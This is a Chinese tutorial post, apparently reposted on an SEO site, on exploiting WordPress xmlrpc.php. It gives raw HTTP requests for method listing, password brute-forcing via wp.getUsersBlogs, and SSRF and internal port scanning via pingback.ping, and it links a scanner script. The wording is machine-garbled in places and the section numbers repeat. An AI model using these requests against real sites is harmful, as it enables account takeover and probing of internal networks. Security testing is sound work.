首页 » SEO优化 » xmlrpcphp技巧_WordPress xmlrpcphp 马脚运用

xmlrpcphp技巧_WordPress xmlrpcphp 马脚运用

访客 2024-10-29 0

扫一扫用手机浏览

文章目录 [+]

WordPress采取了XML-RPC接口.并且通过内置函数WordPress API实现了该接口内容。
以是,你可要通过客户端来管理Wordpress。
通过利用WordPress XML-RPC, 你可以利用业界盛行博客客户端Weblog Clients来发布你的WordPress日志和页面。
同时,XML-RPC 也可利用extended by WordPress Plugins插件来自定义你的规则。

0X01 激活XML-RPC

从3.5版本开始,XML-RPC功能默认开启。
早些版本,可通过如下方法激活:Settings > Writing > Remote Publishing and check the checkbox.

xmlrpcphp技巧_WordPress xmlrpcphp 马脚运用

路径:http://example.com/wordpress/xmlrpc.php

xmlrpcphp技巧_WordPress xmlrpcphp 马脚运用
(图片来自网络侵删)

image.png

0x02 查看系统许可的方法

POST /wordpress/xmlrpc.php HTTP/1.1Host: www.example.comContent-Length: 99<methodCall><methodName>system.listMethods</methodName><params></params></methodCall>

image.png

0x03 账号爆破

一样平常情形下,wordpress的管理后台都会设置账号登录失落败次数限定,因此,可以通过xmlprc.php接口来进行爆破。
常日会利用wp.getUserBlogs、wp.getCategories和metaWeblog.getUsersBlogs这个方法来进行爆破,也可以利用其他的方法。
布局要求包:

POST /wordpress/xmlrpc.php HTTP/1.1Host: www.example.comContent-Length: 99<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>admin</value></param><param><value>password</value></param></params></methodCall>

image.png

爆破成功会返回博客的内容:

image.png

0x03 SSRF

WordPress 版本< 3.5.1通过Pingback可以实现的做事器端要求假造 (Server-side request forgery,SSRF)和远程端口扫描。
布局要求包:

POST /wordpress/xmlrpc.php HTTP/1.1Host: www.example.comContent-Length: 99<methodCall><methodName>pingback.ping</methodName><params><param><value><string>要探测的ip和端口:http://127.0.0.1:80</string></value></param><param><value><string>网站上一篇博客的URL:http://localhost/wordpress/?p=1)<SOME VALID BLOG FROM THE SITE ></string></value></param></params></methodCall>

IP和端口存在,返回包中的<value><int>中的值大于0:

image.png

利用脚本:https://github.com/FireFart/WordpressPingbackPortScanner

0x04 读取文件:

image.png

image.png

0x99 参考:

https://codex.wordpress.org/zh-cn:XML-RPC_Supporthttp://xmlrpc.com/https://medium.com/@the.bilal.rizwan/wordpress-xmlrpc-php-common-vulnerabilites-how-to-exploit-them-d8d3c8600b32https://www.acunetix.com/blog/web-security-zone/wordpress-pingback-vulnerability/http://lab.onsec.ru/2013/01/wordpress-xmlrpc-pingback-additional.html

标签:

相关文章

我国土地利用分类代码的构建与应用

土地利用分类代码是我国土地管理的重要组成部分,是土地资源调查、规划、利用和保护的依据。土地利用分类代码的构建与应用显得尤为重要。本...

SEO优化 2025-02-18 阅读0 评论0

微信跳转微信支付便捷支付体验的秘密武器

移动支付已成为人们日常生活中不可或缺的一部分。作为我国领先的社交平台,微信支付凭借其便捷、安全的支付方式,深受广大用户的喜爱。而微...

SEO优化 2025-02-18 阅读0 评论0

探寻会计科目代码背后的奥秘分类与

会计科目代码是会计信息系统中不可或缺的组成部分,它将企业的经济活动进行分类和归纳,为会计核算、财务分析和决策提供重要依据。本文将从...

SEO优化 2025-02-18 阅读1 评论0